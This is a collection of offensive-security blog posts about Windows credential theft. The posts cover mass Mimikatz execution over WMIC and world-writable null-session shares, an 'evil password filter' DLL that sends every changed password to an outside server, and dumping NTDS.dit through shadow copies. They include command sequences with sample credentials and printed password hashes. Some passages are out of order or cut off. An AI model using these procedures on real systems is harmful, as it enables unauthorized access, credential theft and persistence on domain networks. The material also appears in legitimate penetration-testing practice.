I’ve taken a rather long hiatus from blogging. This is mostly because I was fed up with the blogging platform that I had (Squarespace) and didn’t really have any alternatives that met all of the features I wanted.
So, where am I at now? Github actually. Github allows users to create “Github Pages” for repositories (or be it’s own repo). For the most part these pages are written in Markdown. It’s late and I don’t feel like looking up who, but someone created a project called “Jekyll” which is a Ruby based static page generator and then another project called “Octopress” popped up using Jekyll to create a static html based blogging platform.
It’s a bit of a pain in the butt to use and learn, but once you have a few things automated it gets simpler. It also hits the most bullet points of any other option.
Expect things to pick up pretty quickly here, but as I’m typing this I’m already thinking that promising something like that is a bad idea. We’ll see how it goes, it’s just good to be back.
clymb3r recently posted a script called “Invoke-Mimikatz.ps1” basically what this does is reflectively injects mimikatz into memory, calls for all the logonPasswords and exits. It even checks the targets architecture (x86/x64) first and injects the correct DLL.
You can very easily use this script directly from an admin command prompt as so:
(This works REALLY well for Citrix and Kiosk scenarios and it’s too hard to type/remember)
This runs the powershell script by directly pulling it from Github and executing it “in memory” on your system.
One of the awesome added capabilities for this script is to run on a list of hosts. as so:
This works great as all the output is directly on your system and all executed through Powershell Remoting. Powershell Remoting is pretty much the same as WinRM. This service however is not enabled by default and can be pretty hit or miss on how much any given enterprise uses WinRM. However, it is usually the servers and more important systems that have it enabled more often than not.
You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).
If you find that your target isn’t a WinRM rich environment or you just want more passwords you can take a slightly more painful route, I call it “Mass Mimikatz”
Step 1. Make a share, we are doing this so we can not only collect the output of all our computers passwords, but to host the CMD batch file that will run the powershell script:
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t
We are setting “Everyone” permissions on a Share (net share) and NTFS (icacls) level for this to work properly.
Step 2. Set registry keys. There are two registry keys that we need to set. The first allows Null Sessions to our new share and the second allows null users to have the “Everyone” token so that we don’t have to get crazy with our permissions. I have create a meterpreter script that has a bunch of error checking here: massmimi_reg.rb
or you can just make the following changes”
HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ = open
HKLM\System\CurrentControlSet\Contol\Lsa "EveryoneIncludesAnonymous" = 1
Step 3. Change directory into new “open” directory. This is so our uploads and in particular our web server will be hosted out of the correct directory.
Step 4. Upload powershell script powermeup.cmd – this script will run our hosted Invoke-Mimikatz script on each host:
Step 6. Upload mongoose: Downloads Page – Both regular and tiny versions work. This is an awesome, single executable webserver that supports LUA, Sqlite, and WebDAV out of the box. Tiny version is under 100k.
Step 7. Upload serverlist.txt – This is a line by line list of computer names to use mimikatz on. You’ll have to gather this one way or another.
Step 8. Execute mongoose (from directory with mimikatz.ps1) – This will start a listener with directory listings enabled on port 8080 by default
Step 9a. Execute wmic:
wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"
Step 9b. Execute wmic with creds:
wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"
Step 10. Watch as text files full of wonder and joy fill your share.
Again, this requires you to be a very high privileged account, which is no fun. I need these computer lists as part of my internal / post-exploitation recon, not an end step.
For the longest time I relied on a very awesome tool called “Adfind”:
This command will output a list of computer accounts that have been active in the last 90 days in a straight line by line format (hence all of the no “this”and no “that” flags)
But that wasn’t good enough, this image kept haunting me:
It’s Active Directory Explorer by SysInternals. It shows the complete list of DNS records, stored as objects in Active Directory that I was able to get to as a basic domain user. This means all of the static DNS records for the unix systems and mainframes and other systems outside of the purely Windows world are there as well.
I spent 4 days attempting to write my own script, ldap query, prayer to get all of the data out but was unsuccessful. On the 5th day I happened upon a very short post saying “I did it”, as I probably would have written the same. It comes in the form of a PowerShell script that you can find here:
If you put a -csv on the end of those the author has even given you the CSV format which makes the output extremely easy to parse. Now you can throw your list into your tool of choice instead of scanning random IP ranges on the targets network for important stuff you can scan directly against known good hosts.
— mubix
P.S. Yes I realize this isn’t actually “Zone Transfer”s but its close enough
Password Filters [0] are a way for organizations and governments to enforce stricter password requirements on Windows Accounts than those available by default in Active Directory Group Policy. It is also fairly documented on how to Install and Register Password Filters [1].aspx). Basically what it boils down to is updating a registry key here: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
with the name of a DLL (without the extension) that you place in Windows\System32\
For National CCDC earlier this year (2013), I created an installer and “evil pass filter” that basically installed itself as a password filter and any time any passwords changed it would store the change to a log file locally to the victim (in clear text) as well as issue an HTTP basic auth POST to a server I own with the username and password.
The full code can be found below. I’ll leave the compiling up to you but basically its slamming the code in Visual Studio, telling it its a DLL, and clicking build for the architecture you are targeting (Make sure to use the Internet Open access settings that make the most sense for the environment you are using this in [2.aspx)].
So lets walk the exploitation:
First, you have to be admin or system, as this is more of a persistence method than anything.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Next, we upload the evilpassfilter.dll to Sytem32:
What you can’t see here since Metasploit isn’t showing the line breaks is that there are two there by default:
scecli
rassfm
We need to add ours to the end of this list, unfortunately at the current point of time its impossible to do directly from the meterpreter command line (as far as I know). So we need to drop a .reg file and manually import it. Easiest way to do that is to add your “evilpassfilter” string as well as the ones on the victim to a VM you have and export it. Should look like this:
Once we have our file, we upload and import it using reg command:
This works from Windows 2000, XP all the way up to Windows 8 & 2012.
Ok, but how often are local password changed? Maybe not that often, but guess what happens when a password filter is put on a domain controller. Every password changed by that DC is “verified” by your evil password filter.
Oh and what does that log file we talked about earlier on the victim look like if for some reason they block that IP you’re getting your authentication to? (You would have to find a way to get back on that system, or make it available via a share or otherwise)
If you’ve ever used proxychains to push things through Meterpreter, one of the most annoying things is its “hardcoded” DNS setting for 4.2.2.2, if the org that you are going after doesn’t allow this out of their network, or if you are trying to resolve an internal asset, you’re SOL. After a ton of googling and annoyed head slams into walls every time I forget where this is I’ve finally decided to make a note of it.
There isn’t much magic here other than knowing that this file exists, but /bin/proxyresolv is a bash script that calls “dig” using TCP and the DNS server specified so it goes through the proxychains. Here is what it looks like:
(on Kali linux its found here: /usr/lib/proxychains3/proxyresolv)
12345678910111213
#!/bin/sh# This script is called by proxychains to resolve DNS names# DNS server used to resolve namesDNS_SERVER=4.2.2.2
if[$# = 0 ] ; thenecho" usage:"echo" proxyresolv <hostname> "exitfiexport LD_PRELOAD=libproxychains.so.3
dig $1 @$DNS_SERVER +tcp | awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
Now you could just make the dig request yourself through proxychains then throw whatever you originally attended directly at an IP, or you can make the DNS_SERVER change and hardcode your engagement’s internal IP, up to you, but now its documented and I’ll never have to go searching like crazy again… as long as I remember that its on someone else’s blog.
ScriptJunkie quickly identified that I was using a DWORD for a Handle and using 4 bits for a 64 bit process (should be 8) as well as the fact that I could use a PDWORD with the ProcessInformation inout parameter instead of writing it to memory myself.
Problems are that everyone does this whole blogging thing in so many different ways. Me, personally? I like to have a client that I can save drafts it, work on things a little bit here and there and then finalize stuff when I’m ready to post. I have a couple dozen of these posts ready and set with final tweaks needed but my blogging software Squarespace up and moved on to “Squarespace 6”. The the current stage you don’t have to move to 6 but at some point the owners of Squarespace are going to force everyone over. I don’t want to wait for that to happen.
Octopress and Postach.io are my favorite options right now. Both blog in markdown language which is ok. Converting 8 years of blog posts to markdown is going to be a lot of work but a one time deal. Plus it would give me a chance to go through and fix the things that were broken over the years of modified blogging clients and services.
Postach.io has one major downside, they don’t have good “code” block support, whereas Octopress/Jekyll have excellent support as well code hilighting. The major upside? It’s based on Evernote. Which means I can blog from whereever I have Evernote. They also used to have an EXCELLENT feature that seems to have disappeared where if you updated a post it would automatically throw the blog post up to the top of your page, meaning your update would get back in your RSS feed and the update wouldn’t go unnoticed as most updates to blog posts do.
root@wpad:~/blog/libesedb-20120102# cd esedbtools/
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport
esedbexport 20120102
Missing source file.
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)Database (EDB) file
Usage: esedbexport [ -c codepage ][ -l logfile ][ -m mode ][ -t target ][ -T table_name ][ -hvV ]source source: the source file
-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help -l: logs information about the exported items
-m: export mode, option: all, tables (default)'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version
root@wpad:~/blog/libesedb-20120102/esedbtools#
root@wpad:~/blog/libesedb-20120102/esedbtools# ./esedbexport ../../ntds.dit
esedbexport 20120102
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
Move the exported tables to somewhere a bit easier:
root@wpad:~/blog# cd NTDSXtract 1.0/
root@wpad:~/blog/NTDSXtract 1.0# ls
dscomputers.py dsdeletedobjects.py dsfileinformation.py dsgroups.py dstimeline.py dsusers.py framework ntds
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py [option] options:
--rid
List user identified by RID
--name
List user identified by Name
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history --certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
root@wpad:~/blog/NTDSXtract 1.0#
root@wpad:~/blog/NTDSXtract 1.0# python dsusers.py ../ntds.dit.export/datatable.3 ../ntds.dit.export/link_table.5 --passwordhashes ../SYSTEM.hive --passwordhistory ../SYSTEM.hive
Running with options:
Extracting password hashes
Extracting password historyInitialising engine...
Scanning database - 100% -> 3475 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============Record ID: 3562
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 7ceee337-fa58-4ca0-9643-540a40161020
SID: S-1-5-21-3825330677-773554443-1603823854-500
When created: 2012-08-22 03:12:59
When changed: 2013-05-15 04:06:55
Account expires: Never
Password last set: 2012-08-22 02:49:42.899576
Last logon: 2013-05-15 04:08:04.547236
Last logon timestamp: 2013-05-15 04:06:55.577353
Bad password time 2013-06-07 02:34:34.560516
Logon count: 9
Bad password count: 1
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Administrator
Password hashes:
Administrator:$NT$88e4d9fabaecf3ded18dd80905521b29:::
Password history:
Record ID: 3563
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 659723d7-1246-4959-b0fc-af80ea5e3816
SID: S-1-5-21-3825330677-773554443-1603823854-501
When created: 2012-08-22 03:12:59
When changed: 2013-03-14 06:54:22
Account expires: Never
Password last set: 2013-03-14 06:54:22.029303
Last logon: 2013-03-14 06:54:27.012817
Last logon timestamp: 2013-03-14 06:32:41.834022
Bad password time 2013-06-07 03:07:46.499917
Logon count: 0
Bad password count: 10
User Account Control:
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Guest
Password hashes:
Guest:$NT$823893adfad2ada6e1a414f3ebdf58f7:::
Password history:
Record ID: 3564
User name: user
User principal name:
SAM Account name: user
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: c5a5c87a-93b4-4d80-97a1-1c605b9b0c03
SID: S-1-5-21-3825330677-773554443-1603823854-1000
When created: 2012-08-22 03:12:59
When changed: 2013-06-07 02:51:54
Account expires: Never
Password last set: 2013-03-14 03:25:11.793912
Last logon: 2013-06-07 02:51:54.152191
Last logon timestamp: 2013-06-07 02:51:54.152191
Bad password time 2013-04-19 05:25:40.412670
Logon count: 67
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users user
Password hashes:
user:$NT$88e4d9fabaecf3dec18dd80905521b29:::
Password history:
user_nthistory0:$NT$88e4d9fabafcf3dec18dd80905521b29:::
user_nthistory1:$NT$0c61031f010b2fbb88fe449fbf262477:::
user_nthistory2:$NT$88e4dffabaecf3dec18dd80905521b29:::
user_lmhistory0:c869027e01c3c4fe7626a90c87cc7fed:::
user_lmhistory1:8be023cd858da1edd21b94907afe182c:::
Record ID: 3610
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 74e6bd0b-e4d5-42df-98d5-24f9060061c9
SID: S-1-5-21-3825330677-773554443-1603823854-502
When created: 2012-08-22 03:16:03
When changed: 2012-08-22 03:31:13
Account expires: Never
Password last set: 2012-08-22 03:16:03.166457
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count: 0
Bad password count: 0
User Account Control:
Disabled
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ net projectmentor Users krbtgt
Password hashes:
krbtgt:$NT$7253e8647254716b507a2dcb149ff2da:::
Password history:
krbtgt_nthistory0:$NT$7253e86a7254716a507a2dcb149ff2da:::
krbtgt_lmhistory0:113926e06a31d182623633041b632929:::
Record ID: 3762
User name: John Doe
User principal name: jdoe@projectmentor.net
SAM Account name: jdoe
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: bbf24c63-39a9-4cc4-8aa8-933f9ddee940
SID: S-1-5-21-3825330677-773554443-1603823854-1104
When created: 2012-08-22 04:10:52
When changed: 2013-06-05 13:04:11
Account expires: Never
Password last set: 2013-04-19 07:11:49.849592
Last logon: 2013-06-07 02:56:25.677855
Last logon timestamp: 2013-06-05 13:04:11.674344
Bad password time 2013-05-02 03:01:12.536251
Logon count: 242
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users John Doe
Password hashes:
John Doe:$NT$88e4d9fabaecf3ded18dd80905511b29:::
Password history:
Record ID: 3797
User name: Random User
User principal name: randy@projectmentor.net
SAM Account name: randy
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 2701eb29-628a-4568-a093-d33a7db10d04
SID: S-1-5-21-3825330677-773554443-1603823854-1108
When created: 2013-04-08 02:34:04
When changed: 2013-05-27 16:06:07
Account expires: Never
Password last set: 2013-04-19 06:59:25.423280
Last logon: 2013-04-08 02:34:10.482690
Last logon timestamp: 2013-04-08 02:34:10.482690
Bad password time Never
Logon count: 1
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ net projectmentor Users Random User
Password hashes:
Random User:$NT$88ead9fa5aecf3dec18dd80905521b29:::
Password history:
root@wpad:~/blog/NTDSXtract 1.0#
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV and GPOs not allowing anyone to RDP in (Even Domain Admins) unless they provided some kind of voodo happy dance? Ya me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Lets start
First authenticate to the domain controller and make sure you have a good working directory to use.
12
net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$
Alright, lets say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not allow us to get results directly so we are going to use a temp file on the DC in C:\TEMP where we already made sure is clear.
We are going to be using Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB much like Window’s SAM file except that it stores the entire AD set of objects there), we also need the SYSTEM registry hive. You can get the SAM registry hive as well but that will only get local DC credentials.
So lets list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or if you’ve installed wmic for Linux via http://www.krenger.ch/blog/wmi-commands-from-linux/ ) – this IS an interactive command so this won’t work very nicely in a Meterpreter shell:
123456789
C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C:\tempoutput.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 7304;
ReturnValue = 0;
};
To break down this command:
wmic /node:DC1 – tells it to interact with the WMI API on DC1
process call create – WMI speak for create a process
cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
vssadmin list shadows – List any shadow volumes that already exist
2>&1 > C:\temp\output.txt – Take STDIN and STDERROR and throw it in a text file on DC1 C:\TEMP. Make sure you specify full path because you will be executing from within C:\Windows\System32 and its a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt in C:\Windows\System32 or wherever WMI wants to execute you from for bob.txt
Process starts and then you need to view the output file by either copying it down, type \DC1\C$\TEMP\output.txt or mount the C drive as a network share. Either way you should either see something like this:
1234567891011121314
C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {671090fd-0198}
Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
Shadow Copy ID: {0863e309}
Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: wpad
Service Machine: wpad
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessibleWriters
Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered
or
12345
C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
No items found that satisfy the query
If there are no shadow copies or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C: command. (This command only applies to Server OS (Win2k3/Win2k8) but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):
The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety if a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:WindowsNTDS)
Next we just copy the files out of the shadow copies. First the SYSTEM hive:
